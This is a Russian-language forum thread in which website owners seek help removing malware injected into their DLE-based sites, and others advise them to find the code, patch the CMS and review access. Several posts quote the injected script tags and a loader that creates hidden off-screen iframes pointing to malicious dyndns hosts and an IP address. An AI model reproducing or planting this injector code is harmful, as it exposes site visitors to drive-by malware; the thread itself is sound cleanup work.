Добрый вечер. Сегодня после обеда заметил неприятную особенность на сайте. Постоянно ругается антивирус на разные адреса, так же видно что подвал сайта нарушен. Но тела вируса найти мне не удалось (( Помогите пожалуйста решить проблему, где найти тело вируса и как это лечится ? Сайт unechanews.ru

][alter, не вижу проблемы... На сайт не ругается, подвал вроде бы в порядке... А лечится это, как и обычные вирусы - антивирусом. Приведи скрин "ругания" антивируса.

][alter, приведите подробности, а то будет бан по п. 3.4 (http://forum.oszone.net/rules.html#3.4) :)

Сегодня я уже попал в под фильтр оперы ((.

В подвале явно что то чужеродное так как он сломан.

Но я не могу найти где что ((


Скрины:

http://imageshack.us/photo/my-images/171/83474025.jpg/

http://imageshack.us/photo/my-images/823/63180071.jpg/

На работе сегодня антивирус не ругается. Буду дома проверю как там дела обстоят.

При заходе на сайт, антивирус NOD, находит угрозу HTML/iframe.B.Gen.

Да у меня именно nod32 ругается. Как с этим бороться и самое главное как туда это попало?

в DOM нашел это
<script src="http://u4a.dyndns.tv/followbb.php?i=19703" language="JavaScript">
Reload the page to get source for: http://u4a.dyndns.tv/followbb.php?i=19703
</script>
грузит это
var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://sell00.dyndns-ip.com/main.php?page=7f8d1ec15718a56f'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://178.63.96.144/?rbb'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://u4a.dyndns.tv/?inid=19703&intime=657645061'; document.body.appendChild(frame);

смотрите в скриптах, шаблонах, флешках и т.д.

в шаблоне он просто <script language='JavaScript' src='http://u4a.dyndns.tv/followbb.php?i=19703'></script> тот код я с фаербага скопировал (лишний текст)...

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.

Нашел в index.php.

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.

Уже пропадали полностью данные с базы данных, приходилось восстанавливать из бекапа.

Учитывая что мне уже неплохо помогли на озоне, снова обращаюсь за помощью.
Мое почтение Уважаемые знатоки! Сегодня мне пришло сообщение от Яндекса, что у меня вирус на сайте.
Проверял сайт на вирус тотале, все по нолям.
Решил сам просмотреть через IE HTML своей страницы и обнаружил такую вещь.
<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="#" xml:lang="ru" lang="ru">
<link rel="stylesheet" type="text/css" href="/templates/Zevs/css/menu.css"/>
<head>
<div style='z-index:1000; position: fixed; top:90%; right:0px'>
<SCRIPT Language="javascript">
Вот эта хрень и определяется как вирус http://wildfuckers.dyndns.ws/showforum.php?pid=54543
Подскажите пожалуйста, исходя из приведенного куска кода, где мне искать эту падлюку. Сам увы найти не могу.
Помогите пожалуйста!
Могу в случае необходимости залить куда нибуть весь код.
PS Методом тыка выяснилось, что этот код видно,только когда заходишь на сайт без логина своего. Просто как посетитель без аккаунта.

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Это.
Гугли по этому коду.
Ищи ошибки в модулях CMS.
Прикрывай дырку.

Severny, Да да дружище. Именно эта хрень, но где ее найти понятия не имею. Перелопатил кучу файлов но так и не смог найти.

CMS какая?

Severny, Благодарю за подсказку, буду рыть
DLE 9.7
Еще как вариант
С проверки сайта
List of javascripts included
/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;8

script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

/engine/classes/min/index.php?charset=windows-1251&amp;f=engine/classes/highslide/highslide.js&amp;8

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

/templates/Zevs/js/animatedcollapse.js
/templates/Zevs/js/date.js
/engine/modules/SiteVisited/sv.js
/engine/skins/default.js
http://xslt.alexa.com/site_stats/js/s/b?url=stdclub.name
http://wildfuckers.dyndns.ws/showforum.php?pid=54543
http://hostline.ru/index/banner/from/18698/b/pbanner5
http://mc.yandex.ru/metrika/watch.js
http://counter.rambler.ru/top100.jcn?2567385
Может подскажет вам, где мне искать.

http://forum.searchengines.ru/showthread.php?p=11526772

Severny, Я был уже там, благодаря вашей подсказке. Уже почти все файлы из папки модули перерыл но так ничего и не нашел :sorry:

Нашел код в папке modules\файл functions.php
Но вот как он туда сцуко попал, это вопрос уже. :cry:

Но вот как он туда сцуко попал, это вопрос уже. »
Да как, уязвимость. Обнови версию DLE, почитай что люди советуют. Сообщество есть же у вас?
Я вот по своей Modx стараюсь постоянно отслеживать.

У меня тоже было заражение одного сайта на дополнительном домене. Я владельцу дал с дуру админские права для редактирования.
У него система была заражена. Сайт тоже следом.
Хостер начал верещать, что идет рассылка с сайта, прикрыл доступ.
Почему я сделал вывод, что заражение с компа владельца - был заражен только его сайт, остальные дополнительные на этой версии CMS не были заражены.
Посмотри, у кого админские права есть, ограничь, проверь свою систему.

Severny,
Доступ к файлам сайта, имею только я. Да и в конце то концов, не сайт же Пентагона :lol:
Кому блин понадобился, не понятно.
К файлу functions.php, через админку сайта не подобраться, только по FTP а тут доступ у меня одного.
Пароли блин 15 значные, не верится что кому то понадобилось таки взламывать блин.
И главное, недавно ведь гадость появилась. Проверил бэкап февральский, там нет ничего. По ходу пока в больнице лежал, впиндюрили его. Я так то слежу ведь за этим. буду сейчас девелоперов длевский сношать блин. У меня ведь лицензия, гады такие http://s12.rimg.info/88555bd0c500fbbe35c444820b92989c.gif

Никто специально и не взламывает. Вирус проходит или через уязвимость, или через комп пользователя, когда права полные.

буду сейчас девелоперов длевский сношать блин. У меня ведь лицензия, гады такие »
С презервативом только.

только по FTP а тут доступ у меня одного »
Я и говорю, удели внимание своей системе.

Severny, Очень вам благодарен дружище, за помощь! Система у меня чистая и хорошо защищенная. Хотя и на старуху..., как говорится. Только что скачал от девелоперов патч и установил его. Оченнно сильно звинялись, как ни странно. :o